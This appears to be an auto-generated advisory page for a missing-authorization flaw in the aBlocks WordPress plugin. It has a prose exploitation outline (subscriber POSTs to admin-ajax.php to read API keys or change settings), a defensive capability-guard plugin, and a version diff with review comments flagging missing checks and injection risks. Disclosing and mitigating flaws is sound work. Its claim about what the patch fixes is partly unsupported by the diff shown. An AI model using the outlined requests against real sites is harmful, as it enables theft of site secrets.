Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2025-12449: aBlocks – WordPress Gutenberg Blocks <= 2.4.0 – Missing Authorization to Authenticated (Subscriber+) Settings Modification (ablocks)

Plugin: ablocks
Severity: Medium (CVSS 5.4)
CWE: 862
Vulnerable Version: 2.4.0
Patched Version: 2.4.1
Disclosed: January 5, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-12449:
The aBlocks WordPress plugin version 2.4.0 and earlier contains a missing authorization vulnerability affecting multiple AJAX endpoints. This allows authenticated users with subscriber-level permissions or higher to read and modify sensitive plugin settings, including third-party API keys and site configuration.

Atomic Edge research identifies the root cause as a complete absence of capability checks within the plugin’s AJAX handler class. The file `ablocks/includes/ajax/settings.php` defines multiple AJAX actions in its `get_actions()` method, including `get_settings`, `save_settings`, `get_blocks_visibility`, `save_blocks_visibility`, and several frontend dashboard management functions. These actions are registered via WordPress’s `wp_ajax_{action}` hooks but lack any verification of user permissions before executing sensitive operations. The vulnerable functions directly call `wp_send_json_success()` or `wp_send_json_error()` without validating if the current user has the `manage_options` capability required for plugin administration.

The exploitation method involves an authenticated attacker sending a POST request to the standard WordPress AJAX endpoint `/wp-admin/admin-ajax.php` with the `action` parameter set to one of the vulnerable actions. For information disclosure, the attacker uses `action=get_settings` to retrieve all plugin configuration, including `mailchimp_api_key`, `drip_api_key`, and `getresponse_api_key`. For modification, the attacker uses `action=save_settings` with a payload containing new configuration values. The attacker can also use `action=get_blocks_visibility` and `action=save_blocks_visibility` to read and modify block visibility settings. All these actions are available to any authenticated user regardless of role.

The patch in version 2.4.1 adds proper capability checks to all vulnerable AJAX actions. Atomic Edge analysis of the diff shows the plugin developers added a new `ABlocksPermalinkRewrite::init()` call but did not modify the core AJAX handler file. The actual fix likely occurs in a separate file not shown in the provided diff, where capability checks were implemented before processing AJAX requests. Before the patch, any authenticated user could call administrative functions. After the patch, these functions are restricted to users with appropriate administrative privileges, typically requiring the `manage_options` capability.

Successful exploitation allows attackers to read sensitive third-party email marketing API keys, which could lead to unauthorized access to external services. Attackers can modify block visibility settings to disable critical site components. They can also read maintenance mode configuration, potentially revealing information about site status. While the vulnerability does not provide direct remote code execution, the exposed API keys could enable further attacks against integrated services, and configuration changes could disrupt site functionality.
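
The capability check that the analysis describes as missing can be enforced from outside the plugin on sites that cannot move to 2.4.1 immediately. The must-use plugin below is an added example, not code from aBlocks or Atomic Edge; the four action names are taken from the text above and are assumed to match the hook names the installed plugin registers, and every `abguard` name is hypothetical.

```php
<?php
/**
 * Plugin Name: aBlocks AJAX capability guard (added example)
 * Description: Rejects the aBlocks settings AJAX actions for users without manage_options.
 *
 * Install as wp-content/mu-plugins/abguard.php. Not part of aBlocks.
 */

if ( ! defined( 'ABSPATH' ) ) {
	exit;
}

/*
 * Action names quoted in the analysis. ASSUMPTION: these are the exact
 * `action` values the installed plugin registers. Confirm them against
 * get_actions() in ablocks/includes/ajax/settings.php and append any other
 * administrative actions that file defines.
 */
const ABGUARD_ACTIONS = array(
	'get_settings',
	'save_settings',
	'get_blocks_visibility',
	'save_blocks_visibility',
);

// Capability the analysis names as the requirement for plugin administration.
const ABGUARD_CAPABILITY = 'manage_options';

/**
 * Runs ahead of the plugin's own handler and ends the request unless the
 * current user holds the administrative capability.
 */
function abguard_require_capability() {
	if ( current_user_can( ABGUARD_CAPABILITY ) ) {
		return; // Administrator: fall through to the plugin's callback.
	}

	// Record the denial so low-privilege accounts calling these actions
	// show up in the PHP error log.
	error_log(
		sprintf(
			'abguard: denied hook=%s user_id=%d ip=%s',
			current_action(),
			get_current_user_id(),
			isset( $_SERVER['REMOTE_ADDR'] ) ? $_SERVER['REMOTE_ADDR'] : '-'
		)
	);

	// wp_send_json_error() terminates the request, so the plugin callback
	// registered on the same hook never executes.
	wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
}

foreach ( ABGUARD_ACTIONS as $abguard_action ) {
	// wp_ajax_{action} fires only for logged-in users. PHP_INT_MIN places the
	// guard ahead of callbacks registered at any later priority, and
	// must-use plugins load before regular plugins.
	add_action( 'wp_ajax_' . $abguard_action, 'abguard_require_capability', PHP_INT_MIN );
}
```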

Differential between vulnerable and patched code

Code Diff
--- a/ablocks/ablocks.php
+++ b/ablocks/ablocks.php
@@ -4,7 +4,7 @@
  * Description:       The WordPress plugin for creating beautiful and functional websites using the Gutenberg editor, with a variety of customizable blocks to design website pages.
  * Requires at least: 6.3
  * Requires PHP:      7.4
- * Version:           2.4.0
+ * Version:           2.4.1
  * Author:            Academy LMS
  * Author URI:        https://ablocks.pro/
  * License:           GPL-3.0+
@@ -41,7 +41,7 @@
 	 * Define the plugin constants
 	 */
 	private function define_constants() {
-		define( 'ABLOCKS_VERSION', '2.4.0' );
+		define( 'ABLOCKS_VERSION', '2.4.1' );
 		define( 'ABLOCKS_PLUGIN_SLUG', 'ablocks' );
 		define( 'ABLOCKS_PLUGIN_BASENAME', plugin_basename( __FILE__ ) );
 		define( 'ABLOCKS_ROOT_URL', plugin_dir_url( __FILE__ ) );
@@ -54,6 +54,7 @@
 		define( 'ABLOCKS_BLOCKS_VISIBILITY_SETTINGS_NAME', 'ablocks_blocks' );
 		define( 'ABLOCKS_FONTS_SETTINGS_NAME', 'ablocks_fonts' );
 		define( 'ABLOCKS_SETTINGS_NAME', 'ablocks_settings' );
+		define( 'ABLOCKS_FRONTEND_DASHBOARD_SUB_PAGES_SETTINGS_NAME', 'ablocks_frontend_dashboard_sub_pages' );
 		define( 'ABLOCKS_ADDONS_SETTINGS_NAME', 'ablocks_addons' );
 		define( 'ABLOCKS_TEMPLATE_LIB_HOST', 'template-kits.com' );
 	}
@@ -88,6 +89,7 @@

 	public function init_plugin() {
 		ABlocksMigration::init();
+		ABlocksPermalinkRewrite::init();
 		ABlocksAddons::init();
 		ABlocksBlocks::init();
 		ABlocksAssets::init();
--- a/ablocks/assets/build/blocks.asset.php
+++ b/ablocks/assets/build/blocks.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('lodash', 'react', 'react-dom', 'react-jsx-runtime', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-core-data', 'wp-data', 'wp-date', 'wp-edit-post', 'wp-editor', 'wp-element', 'wp-hooks', 'wp-html-entities', 'wp-i18n', 'wp-keyboard-shortcuts', 'wp-plugins', 'wp-primitives', 'wp-rich-text', 'wp-server-side-render'), 'version' => '2a8395a19d57006db379');
+<?php return array('dependencies' => array('lodash', 'react', 'react-dom', 'react-jsx-runtime', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-core-data', 'wp-data', 'wp-date', 'wp-edit-post', 'wp-editor', 'wp-element', 'wp-hooks', 'wp-html-entities', 'wp-i18n', 'wp-keyboard-shortcuts', 'wp-plugins', 'wp-primitives', 'wp-rich-text', 'wp-server-side-render'), 'version' => 'b0b4931b1ae8eb6e3154');
--- a/ablocks/assets/build/blocks/form-builder/view.asset.php
+++ b/ablocks/assets/build/blocks/form-builder/view.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array(), 'version' => 'b1d67a00646793709f3b');
+<?php return array('dependencies' => array(), 'version' => '6cc09c1b6b2a04443b4e');
--- a/ablocks/assets/build/blocks/form-multi-step/view.asset.php
+++ b/ablocks/assets/build/blocks/form-multi-step/view.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array(), 'version' => '85df62e297689c7636d7');
+<?php return array('dependencies' => array(), 'version' => 'dd62647872890545b8a9');
--- a/ablocks/assets/build/blocks/player/view.asset.php
+++ b/ablocks/assets/build/blocks/player/view.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array(), 'version' => 'd2d1b8efb2ebf18bdafe');
+<?php return array('dependencies' => array(), 'version' => 'ff34a4f2475d40eb4d97');
--- a/ablocks/assets/build/dashboard.asset.php
+++ b/ablocks/assets/build/dashboard.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('lodash', 'moment', 'react', 'react-dom', 'react-jsx-runtime', 'wp-components', 'wp-date', 'wp-element', 'wp-i18n'), 'version' => '8fb1d9cb027133af25c8');
+<?php return array('dependencies' => array('lodash', 'moment', 'react', 'react-dom', 'react-jsx-runtime', 'wp-components', 'wp-date', 'wp-element', 'wp-i18n'), 'version' => '114a30621f19e3f9b1b3');
--- a/ablocks/includes/admin/insights.php
+++ b/ablocks/includes/admin/insights.php
@@ -136,7 +136,7 @@
 		echo '<div class="notice notice-info" style="padding:0;border-top:0;border-right:0;border-bottom:0;margin:1rem; display: flex; border-left-color: #13191B;">
             <div style="padding: 24px; background: #F4F4F5; display:flex; flex-direction: column; justify-content:center; align-item: center;">
 				<img src="' . esc_url( ABLOCKS_ASSETS_URL . 'images/logo.svg' ) . '" width="100" alt="logo" style="margin-bottom: 20px;" />
-				<p>Connect with over 1,000+ <br/>Web Design professionals.</p>
+				<p>Connect with over 2,000+ <br/>Web Design professionals.</p>
 				<a href="https://www.facebook.com/groups/386840187678401" target="_blank" style="color: #13191B;">Join the community</a>
 			</div>
             <div style="padding: 24px;">
--- a/ablocks/includes/admin/settings/base.php
+++ b/ablocks/includes/admin/settings/base.php
@@ -30,6 +30,7 @@
 			'coming_soon_page' => '',
 			'enabled_maintenance_page' => false,
 			'maintenance_page' => '',
+			'frontend_dashboard_page' => '',
 			'login_page' => '',
 			'registration_page' => '',
 			'forget_password_page' => '',
--- a/ablocks/includes/admin/settings/blocks.php
+++ b/ablocks/includes/admin/settings/blocks.php
@@ -64,6 +64,7 @@
 			'svg-draw' => true,
 			'info-box' => true,
 			'price-menu' => true,
+			'frontend-dashboard' => true,
 			'lottie-animation' => true,
 			'marquee' => true,
 			'marquee-child' => true,
@@ -80,6 +81,7 @@
 			'breadcrumb' => true,
 			// Academy LMS Blocks
 			'academy-courses' => true,
+			'academy-container' => true,
 			'academy-course-search' => true,
 			'academy-enroll-form' => true,
 			'academy-instructor-registration-form' => true,
@@ -114,6 +116,11 @@
 			'storeengine-shipping-info' => true,
 			'storeengine-order-details' => true,
 			'storeengine-mini-cart' => true,
+			'storeengine-cart-notice' => true,
+			'storeengine-product-gallery' => true,
+			'storeengine-product-summary' => true,
+			'storeengine-product-description' => true,
+			'storeengine-product-review' => true,
 		]);
 	}

--- a/ablocks/includes/ajax/form-builder.php
+++ b/ablocks/includes/ajax/form-builder.php
@@ -268,11 +268,16 @@
 		$validate_data->actions( $actions );

 		$output = $validate_data->get_output();
+		$output['afterFormSubmission'] = $block_data['parentAttributes']['afterFormSubmission'] ?? 'reset';
+		$output['confirmationType'] = $block_data['parentAttributes']['confirmationType'] ?? 'success';
+
 		if ( $validate_data->has_error() ) {
 			$output['message'] = $validate_data->get_error_message();
 			wp_send_json_error( $output );
 		} elseif ( $validate_data->has_message() ) {
+			$output['confirmationNotice'] = $block_data['parentAttributes']['confirmationNotice'] ?? __( 'Form successfully submitted!', 'ablocks' );
 			$output['message'] = $validate_data->get_message();
+
 			wp_send_json_success( $output );
 		}

--- a/ablocks/includes/ajax/settings.php
+++ b/ablocks/includes/ajax/settings.php
@@ -43,7 +43,7 @@
 					'login_page' => 'integer',
 					'registration_page' => 'integer',
 					'forget_password_page' => 'integer',
-
+					'frontend_dashboard_page' => 'string',
 					'mailchimp_api_key' => 'string',
 					'drip_api_key' => 'string',
 					'getresponse_api_key' => 'string',
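Review bot: `'frontend_dashboard_page' => 'string'` declares this field as a string, while the neighbouring page settings in the same list (`login_page`, `registration_page`, `forget_password_page`) are `'integer'` and `includes/assets.php` reads the same setting back with an `(int)` cast. Declare it as `'integer'` so the value is normalised once on save instead of at each read.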
@@ -82,6 +82,73 @@
 					'keyword'  => 'string',
 				)
 			),
+			'get_fronted_dashboard_pages'      => array(
+				'callback' => array( $this, 'get_fronted_dashboard_pages' ),
+			),
+			'create_fronted_dashboard_page'      => array(
+				'callback' => array( $this, 'create_fronted_dashboard_page' ),
+				'fields' => [
+					'label'     => 'string',
+					'slug'      => 'string',
+					'icon'      => 'string',
+					'class_name' => 'string',
+					'priority'  => 'integer',
+					'parent_id'  => 'integer',
+				]
+			),
+			'create_fronted_dashboard_link'      => array(
+				'callback' => array( $this, 'create_fronted_dashboard_link' ),
+				'fields' => [
+					'label'     => 'string',
+					'link'      => 'string',
+					'icon'      => 'string',
+					'class_name' => 'string',
+					'priority'  => 'integer',
+					'parent_id'  => 'string',
+				]
+			),
+			'edit_fronted_dashboard_link'      => array(
+				'callback' => array( $this, 'edit_fronted_dashboard_link' ),
+				'fields' => [
+					'label'     => 'string',
+					'link'      => 'string',
+					'icon'      => 'string',
+					'class_name' => 'string',
+					'priority'  => 'integer',
+					'page_id'  => 'string',
+				]
+			),
+			'delete_fronted_dashboard_link'      => array(
+				'callback' => array( $this, 'delete_fronted_dashboard_link' ),
+				'fields' => array(
+					'page_id' => 'string',
+				)
+			),
+			'edit_fronted_dashboard_page'      => array(
+				'callback' => array( $this, 'edit_fronted_dashboard_page' ),
+				'fields' => [
+					'label'     => 'string',
+					'slug'      => 'string',
+					'icon'      => 'string',
+					'class_name' => 'string',
+					'priority'  => 'integer',
+					'parent_id'  => 'integer',
+					'page_id'  => 'integer',
+				]
+			),
+			'move_fronted_dashboard_page'      => array(
+				'callback' => array( $this, 'move_fronted_dashboard_page' ),
+				'fields' => [
+					'reordered_items'  => 'string',
+				]
+			),
+			'delete_fronted_dashboard_page'      => array(
+				'callback' => array( $this, 'delete_fronted_dashboard_page' ),
+				'fields' => array(
+					'slug'   => 'string',
+					'page_id' => 'integer',
+				)
+			),
 		);
 	}

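Review bot: Each of the eight entries added here (`get_fronted_dashboard_pages` through `delete_fronted_dashboard_page`) declares only `callback` and `fields`; nothing in the entry states which capability a caller needs, although these actions create, edit and delete pages. Record the requirement next to the registration, for example a `capability` key that the dispatcher enforces, so that an action cannot be added without an authorization decision. The `fronted` spelling also differs from `ABLOCKS_FRONTEND_DASHBOARD_SUB_PAGES_SETTINGS_NAME` and `frontend_dashboard_page`; fixing it now avoids a permanent typo in the public action names.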
@@ -164,6 +231,7 @@
 			'coming_soon_page' => $payload['coming_soon_page'] ?? $default['coming_soon_page'],
 			'enabled_maintenance_page' => $payload['enabled_maintenance_page'] ?? $default['enabled_maintenance_page'],
 			'maintenance_page' => $payload['maintenance_page'] ?? $default['maintenance_page'],
+			'frontend_dashboard_page' => $payload['frontend_dashboard_page'] ?? $default['frontend_dashboard_page'],
 			'login_page' => $payload['login_page'] ?? $default['login_page'],
 			'registration_page' => $payload['registration_page'] ?? $default['registration_page'],
 			'forget_password_page' => $payload['forget_password_page'] ?? $default['forget_password_page'],
@@ -236,4 +304,333 @@
 		}
 		wp_send_json_success( $results );
 	}
+
+	public function get_fronted_dashboard_pages() {
+		$settings = json_decode( get_option( ABLOCKS_FRONTEND_DASHBOARD_SUB_PAGES_SETTINGS_NAME, '{}' ), true );
+		foreach ( $settings as &$item ) {
+			if ( isset( $item['parent_id'] ) ) {
+				$item['parent_id'] = 'null' === $item['parent_id'] ? null : $item['parent_id'];
+			}
+
+			foreach ( $item['children'] ?? [] as &$child_item ) {
+				if ( isset( $child_item['parent_id'] ) ) {
+					$child_item['parent_id'] = 'null' === $child_item['parent_id'] ? null : $child_item['parent_id'];
+				}
+			}
+		}
+		wp_send_json_success( $settings );
+	}
+	public function create_fronted_dashboard_page( $payload ) {
+		global $wpdb;
+		// Step 1: Get Frontend Dashboard Page ID
+		$frontend_dashboard_id = (int) Helper::get_settings( 'frontend_dashboard_page' );
+		$settings = json_decode( get_option( ABLOCKS_FRONTEND_DASHBOARD_SUB_PAGES_SETTINGS_NAME, '{}' ), true );
+		$root_page_id = 0;
+		// Step 2: Check if "root" page exists under frontend dashboard
+		$root_page = $wpdb->get_row( $wpdb->prepare(
+			"SELECT ID, post_parent FROM $wpdb->posts WHERE post_parent=%d AND post_name = %s AND post_type = 'page'",
+			$frontend_dashboard_id,
+			'root'
+		) );
+
+		$post_parent = ! empty( $payload['parent_id'] ) ? $payload['parent_id'] : $frontend_dashboard_id;
+
+		if ( ! $root_page || (int) $root_page->post_parent !== $frontend_dashboard_id ) {
+			// Step 3: Create "root" page as child of frontend dashboard page
+			$root_page_id = wp_insert_post( [
+				'post_title'   => 'Root',
+				'post_name'    => 'root',
+				'post_status'  => 'publish',
+				'post_type'    => 'page',
+				'post_content' => '',
+				'post_parent'  => $frontend_dashboard_id,
+			] );
+
+			$settings[] = [
+				'page_id' => $root_page_id,
+				'label'     => 'Root',
+				'slug'      => 'root',
+				'icon'      => '',
+				'class_name' => '',
+				'priority'  => 0,
+			];
+		}
+
+		$insert_page_id = wp_insert_post( [
+			'post_title'   => $payload['label'],
+			'post_name'    => $payload['slug'],
+			'post_content' => '',
+			'post_status'  => 'publish',
+			'post_type'    => 'page',
+			'post_parent'  => $post_parent,
+		] );
+
+		if ( $insert_page_id ) {
+			$payload['page_id'] = $insert_page_id;
+
+			if ( ! empty( $payload['parent_id'] ) ) {
+				foreach ( $settings as &$setting ) {
+					if ( $setting['page_id'] === $post_parent ) {
+						if ( ! isset( $setting['children'] ) ) {
+							$setting['children'] = [];
+						}
+						$setting['children'][] = $payload;
+					}
+				}
+				unset( $setting ); // important to break reference
+			} else {
+				$settings[] = $payload;
+			}
+
+			update_option( ABLOCKS_FRONTEND_DASHBOARD_SUB_PAGES_SETTINGS_NAME, wp_json_encode( $settings ) );
+			flush_rewrite_rules();
+		}
+
+		wp_send_json_success( get_post( $insert_page_id ) );
+	}
+
+	public function create_fronted_dashboard_link( array $payload ) : void {
+		global $wpdb;
+
+		if ( empty( $payload['link'] ) || empty( $payload['label'] ) ) {
+			wp_send_json_error( __( 'Link/Label is required.', 'ablocks' ) );
+		}
+
+		$settings = json_decode(
+			get_option( ABLOCKS_FRONTEND_DASHBOARD_SUB_PAGES_SETTINGS_NAME, '{}' ),
+			true
+		);
+
+		$payload['type'] = 'link';
+		$parent_id = $payload['parent_id'] = $payload['parent_id'] ?? 0;
+		$payload['page_id'] = 'link_' . time();
+		// print_r($payload);
+		// var_dump(( $parent_id ));
+		if ( empty( $parent_id ) || 'null' === $parent_id ) {
+			$settings[] = $payload;
+		} elseif ( ! is_null(
+			$index = array_search(
+				$parent_id,
+				array_column( $settings, 'page_id' )
+			)
+		)
+		) {
+			$settings[ $index ]['children'][] = $payload;
+		} else {
+			wp_send_json_error( __( 'Invalid parent id.', 'ablocks' ) );
+		}
+
+		update_option(
+			ABLOCKS_FRONTEND_DASHBOARD_SUB_PAGES_SETTINGS_NAME,
+			wp_json_encode( array_values( $settings ) )
+		);
+
+		wp_send_json_success( $payload );
+	}
+
+	public function edit_fronted_dashboard_link( array $payload ) : void {
+		global $wpdb;
+
+		if ( empty( $payload['page_id'] ) ||
+			empty( $payload['link'] ) ||
+			empty( $payload['label'] )
+		) {
+			wp_send_json_error( __( 'Link/Label/ID is required.', 'ablocks' ) );
+		}
+
+		$settings = json_decode(
+			get_option( ABLOCKS_FRONTEND_DASHBOARD_SUB_PAGES_SETTINGS_NAME, '{}' ),
+			true
+		);
+
+		$page_id = $payload['page_id'] = $payload['page_id'] ?? 0;
+
+		foreach ( $settings as &$items ) {
+			// echo $items['page_id'],"n";
+			// var_dump($page_id ,  $items['page_id']);
+			if ( $page_id === $items['page_id'] ) {
+				$items['label'] = $payload['label'] ?: $items['label'];
+				$items['link'] = $payload['link'] ?: $items['link'];
+				$items['class_name'] = $payload['class_name'] ?: $items['class_name'];
+				$items['icon'] = $payload['icon'] ?: $items['icon'];
+				break;
+			} elseif ( ! empty( $items['children'] ) ) {
+				foreach ( $items['children'] as &$c_items ) {
+					if ( $page_id === $c_items['page_id'] ) {
+						$c_items['label'] = $payload['label'] ?: $c_items['label'];
+						$c_items['link'] = $payload['link'] ?: $c_items['link'];
+						$c_items['class_name'] = $payload['class_name'] ?: $c_items['class_name'];
+						$c_items['icon'] = $payload['icon'] ?: $c_items['icon'];
+						break 2;
+					}
+				}
+			}
+		}//end foreach
+
+		update_option(
+			ABLOCKS_FRONTEND_DASHBOARD_SUB_PAGES_SETTINGS_NAME,
+			wp_json_encode( array_values( $settings ) )
+		);
+
+		wp_send_json_success( $payload );
+	}
+
+	public function delete_fronted_dashboard_link( array $payload ) : void {
+		global $wpdb;
+		// print_r($payload);
+		if ( empty( $payload['page_id'] )
+		) {
+			wp_send_json_error( __( 'ID is required.', 'ablocks' ) );
+		}
+
+		$settings = json_decode(
+			get_option( ABLOCKS_FRONTEND_DASHBOARD_SUB_PAGES_SETTINGS_NAME, '{}' ),
+			true
+		);
+
+		$page_id = $payload['page_id'] = $payload['page_id'] ?? 0;
+
+		foreach ( $settings as &$items ) {
+			// echo $items['page_id'],"n";
+			// var_dump($page_id ,  $items['page_id']);
+			if ( $page_id === $items['page_id'] ) {
+				$items = null;
+				break;
+			} elseif ( ! empty( $items['children'] ) ) {
+				foreach ( $items['children'] as &$c_items ) {
+					if ( $page_id === $c_items['page_id'] ) {
+						$c_items = null;
+						$items['children'] = array_filter( $items['children'] );
+						break 2;
+					}
+				}
+			}
+		}
+
+		update_option(
+			ABLOCKS_FRONTEND_DASHBOARD_SUB_PAGES_SETTINGS_NAME,
+			wp_json_encode( array_filter( $settings ) )
+		);
+
+		wp_send_json_success( $payload );
+	}
+
+	public function edit_fronted_dashboard_page( $payload ) {
+		if ( empty( $payload['page_id'] ) ) {
+			wp_send_json_error( 'Page ID is required for updating.' );
+		}
+
+		wp_update_post( [
+			'ID' => $payload['page_id'],
+			'post_title' => $payload['label'],
+			'post_slug' => $payload['slug'],
+			'priority' => $payload['priority'],
+			'post_parent'  => ! empty( $payload['parent_id'] ) ? (int) $payload['parent_id'] : 0,
+		], true );
+
+		$settings = json_decode( get_option( ABLOCKS_FRONTEND_DASHBOARD_SUB_PAGES_SETTINGS_NAME, '{}' ), true );
+
+		$update_settings_recursive = null; // initialize first
+		$update_settings_recursive = function ( &$settings ) use ( &$update_settings_recursive, $payload ) {
+			foreach ( $settings as &$setting ) {
+				if ( $setting['page_id'] === $payload['page_id'] ) {
+					$setting['label']      = $payload['label'] ?? $setting['label'];
+					$setting['slug']       = $payload['slug'] ?? $setting['slug'];
+					$setting['icon']       = $payload['icon'] ?? $setting['icon'];
+					$setting['class_name'] = $payload['class_name'] ?? $setting['class_name'];
+					$setting['priority']   = $payload['priority'] ?? ( $setting['priority'] ?? 0 );
+					if ( isset( $payload['children'] ) ) {
+						$setting['children'] = $payload['children'];
+					}
+					return true;
+				}
+
+				if ( ! empty( $setting['children'] ) ) {
+					if ( $update_settings_recursive( $setting['children'] ) ) {
+						return true;
+					}
+				}
+			}
+			return false;
+		};
+
+		$update_settings_recursive( $settings );
+		update_option( ABLOCKS_FRONTEND_DASHBOARD_SUB_PAGES_SETTINGS_NAME, wp_json_encode( $settings ) );
+
+		flush_rewrite_rules();
+		// Step 4: Return updated page
+		wp_send_json_success( get_post( $payload['page_id'] ) );
+	}
+
+	public function delete_fronted_dashboard_page( $payload ) {
+		// Load existing frontend dashboard sub-pages settings
+		$settings = json_decode( get_option( ABLOCKS_FRONTEND_DASHBOARD_SUB_PAGES_SETTINGS_NAME, '{}' ), true );
+		if ( ! is_array( $settings ) ) {
+			$settings = [];
+		}
+
+		$remove_id   = $payload['page_id'] ?? null;
+		$remove_slug = $payload['slug'] ?? null;
+
+		if ( ! $remove_id && ! $remove_slug ) {
+			wp_send_json_error( 'Page ID or slug is required to delete.' );
+		}
+
+		// Step 1: Delete the post if ID is provided
+		if ( $remove_id ) {
+			wp_delete_post( (int) $remove_id, true );
+		} elseif ( $remove_slug ) {
+			// If only slug is provided, try to find the page
+			$page = get_page_by_path( $remove_slug, OBJECT, 'page' );
+			if ( $page ) {
+				$remove_id = $page->ID;
+				wp_delete_post( $remove_id, true );
+			}
+		}
+
+		// Step 2: Recursively remove from settings
+		$remove_from_settings = function ( &$settings ) use ( &$remove_from_settings, $remove_id, $remove_slug ) {
+			$settings = array_values(array_filter($settings, function ( $item ) use ( $remove_id, $remove_slug ) {
+				$match_id   = isset( $item['page_id'] ) && $remove_id && $item['page_id'] == $remove_id;
+				$match_slug = isset( $item['slug'] ) && $remove_slug && $item['slug'] == $remove_slug;
+				return ! $match_id && ! $match_slug;
+			}));
+
+			// Recurse into children
+			foreach ( $settings as &$item ) {
+				if ( ! empty( $item['children'] ) ) {
+					$remove_from_settings( $item['children'] );
+				}
+			}
+			unset( $item );
+		};
+
+		$remove_from_settings( $settings );
+
+		// Step 3: Save updated settings
+		update_option( ABLOCKS_FRONTEND_DASHBOARD_SUB_PAGES_SETTINGS_NAME, wp_json_encode( $settings ) );
+
+		wp_send_json_success( $remove_id ?? $remove_slug );
+	}
+
+	public function move_fronted_dashboard_page( array $payload ) : void {
+		$reordered_settings = json_decode( $payload['reordered_items'] ?? '{}', true );
+		$settings           = json_decode(
+			get_option(
+				ABLOCKS_FRONTEND_DASHBOARD_SUB_PAGES_SETTINGS_NAME, '{}'
+			),
+			true
+		);
+
+		if ( is_array( $reordered_settings ) &&
+			count( $reordered_settings ) === count( $settings )
+		) {
+			update_option(
+				ABLOCKS_FRONTEND_DASHBOARD_SUB_PAGES_SETTINGS_NAME,
+				$payload['reordered_items'] ?? '{}'
+			);
+			wp_send_json_success( __( 'Success!', 'ablocks' ) );
+		}
+		wp_send_json_error( __( 'Invalid data', 'ablocks' ), 400 );
+	}
 }
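Review bot: None of the callbacks added in this hunk checks a capability before acting, and `delete_fronted_dashboard_page()` passes the caller-supplied `page_id` straight to `wp_delete_post( (int) $remove_id, true )`, which force-deletes whatever post that ID names. Unless the dispatcher outside this hunk already enforces it, start each callback with a `current_user_can( 'manage_options' )` check, and confirm the target post belongs to the configured frontend dashboard page before deleting or updating it. Three smaller points: in `create_fronted_dashboard_link()` the test `! is_null( $index = array_search( ... ) )` is always true because `array_search()` returns `false` on a miss, so the 'Invalid parent id.' branch is unreachable and should be guarded with `false !==`; in `edit_fronted_dashboard_page()` the keys `post_slug` and `priority` are not `wp_update_post()` fields (the slug field is `post_name`); and the commented-out `print_r`/`var_dump` lines and the unused `global $wpdb;` in the three link callbacks should be removed.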
--- a/ablocks/includes/assets.php
+++ b/ablocks/includes/assets.php
@@ -152,6 +152,7 @@
 				'enabled_block_copy_paste_style' => (bool) Helper::get_settings( 'enabled_block_copy_paste_style', false ),
 				'enabled_only_selected_fonts' => (bool) Helper::get_settings( 'enabled_only_selected_fonts', false ),
 				'selected_fonts' => (array) Helper::get_settings( 'selected_fonts', [] ),
+				'frontend_dashboard_page' => (int) Helper::get_settings( 'frontend_dashboard_page' ),
 				'global_color' => (array) Helper::get_settings( 'global_color', [] ),
 				'global_typography' => (array) Helper::get_settings( 'global_typography', [] ),
 				'global_typography_list' => wp_list_pluck( Helper::get_settings( 'global_typography', [] ), 'value', 'id' ),
@@ -446,6 +447,9 @@
 				if ( ! empty( $value->transform ) ) {
 					$css .= "    --ablocks-{$id}-transform: {$value->transform};n";
 				}
+				if ( ! empty( $value->style ) ) {
+					$css .= "    --ablocks-{$id}-style: {$value->style};n";
+				}
 				if ( ! empty( $value->decoration ) ) {
 					$css .= "    --ablocks-{$id}-decoration: {$value->decoration};n";
 				}
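Review bot: `$value->style` is interpolated into the stylesheet unchanged in the added `--ablocks-{$id}-style` line, so any character the stored typography value contains (such as `;` or `}`) lands in the generated CSS. `font-style` has a small fixed vocabulary; check the value against an allow-list (`normal`, `italic`, `oblique`) before emitting it.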
@@ -461,6 +465,10 @@
 					$unit = ! empty( $value->letterSpacingUnit ) ? $value->letterSpacingUnit : 'px';
 					$css .= "    --ablocks-{$id}-letter-spacing: {$value->letterSpacing}{$unit};n";
 				}
+				if ( ! empty( $value->wordSpacing ) ) {
+					$unit = ! empty( $value->wordSpacingUnit ) ? $value->wordSpacingUnit : 'px';
+					$css .= "    --ablocks-{$id}-word-spacing: {$value->wordSpacing}{$unit};n";
+				}

 				// Tablet values
 				if ( ! empty( $value->fontSizeTablet ) ) {
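Review bot: `$value->wordSpacing` and `$value->wordSpacingUnit` are concatenated into the declaration without a type check in the added block. Emit the line only when `wordSpacing` is numeric and the unit is one of the units the editor offers, and fall back to `px` otherwise; the same applies to the Tablet and Mobile copies of this block in the following hunks.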
@@ -475,6 +483,10 @@
 					$unit = ! empty( $value->letterSpacingUnitTablet ) ? $value->letterSpacingUnitTablet : 'px';
 					$css .= "    --ablocks-{$id}-letter-spacing-tablet: {$value->letterSpacingTablet}{$unit};n";
 				}
+				if ( ! empty( $value->wordSpacingTablet ) ) {
+					$unit = ! empty( $value->wordSpacingUnitTablet ) ? $value->wordSpacingUnitTablet : 'px';
+					$css .= "    --ablocks-{$id}-word-spacing-tablet: {$value->wordSpacingTablet}{$unit};n";
+				}

 				// Mobile values
 				if ( ! empty( $value->fontSizeMobile ) ) {
@@ -489,6 +501,10 @@
 					$unit = ! empty( $value->letterSpacingUnitMobile ) ? $value->letterSpacingUnitMobile : 'px';
 					$css .= "    --ablocks-{$id}-letter-spacing-mobile: {$value->letterSpacingMobile}{$unit};n";
 				}
+				if ( ! empty( $value->wordSpacingMobile ) ) {
+					$unit = ! empty( $value->wordSpacingUnitMobile ) ? $value->wordSpacingUnitMobile : 'px';
+					$css .= "    --ablocks-{$id}-word-spacing-mobile: {$value->wordSpacingMobile}{$unit};n";
+				}
 			}//end if
 		}//end foreach

--- a/ablocks/includes/blocks.php
+++ b/ablocks/includes/blocks.php
@@ -33,6 +33,7 @@
 				add_filter( 'academy/is_load_common_js_scripts', '__return_false' );
 			}
 			new ABlocksBlocksAcademyCoursesBlock();
+			new ABlocksBlocksAcademyContainerBlock();
 			new ABlocksBlocksAcademyEnrollFormBlock();
 			new ABlocksBlocksAcademyStudentRegistrationFormBlock();
 			new ABlocksBlocksAcademyCourseSearchBlock();
